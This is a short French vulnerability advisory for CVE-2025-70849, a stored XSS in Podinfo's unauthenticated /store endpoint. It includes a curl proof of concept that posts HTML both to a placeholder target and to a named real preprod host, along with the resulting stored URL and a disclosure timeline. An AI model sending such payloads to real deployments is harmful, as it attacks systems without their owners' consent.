CVE-2025-70849 : XSS stocké dans Podinfo
Résumé
Une vulnérabilité de sécurité (CWE-79) a été identifiée dans Podinfo, une application web pour démontrer les microservices Kubernetes. La fonctionnalité /store permet à des utilisateurs non authentifiés de télécharger du contenu HTML/JS arbitraire, conduisant à un XSS stocké.
Détails de la vulnérabilité
- CVE ID: CVE-2025-70849
- Product: Podinfo
- Endpoint affecté :
/store
- Type de vulnérabilité : Cross-Site Scripting stocké (XSS)
- Versions affectées :
<= 6.10.0
Preuve de concept (PoC)
- Envoyer la charge utile malveillante :
curl -X POST https://target/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'
exemple avec cible réelle :
curl -X POST https://podinfo.xcr.preprod55.prepd.eastus.kaas.sws.siemens.com/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'
-
Accéder au hash retourné : https:///store/
exemple : https://podinfo.xcr.preprod55.prepd.eastus.kaas.sws.siemens.com/store/8c1591e1b1e025067a2d73c0853b9a76bd8fc91a
Chronologie
- Découverte : Sep 2025
- Fournisseur notifié : 25 OCT 2025
- Réponse du fournisseur : Accusé de réception ; aucun calendrier actuel pour un correctif.
- Divulgation publique : Février 2026
Avis de non-responsabilité
Cette recherche est à but éducatif uniquement.
REMERCIEMENTS À :
Kazi Sabbir |
Gravité : Moyen 6.4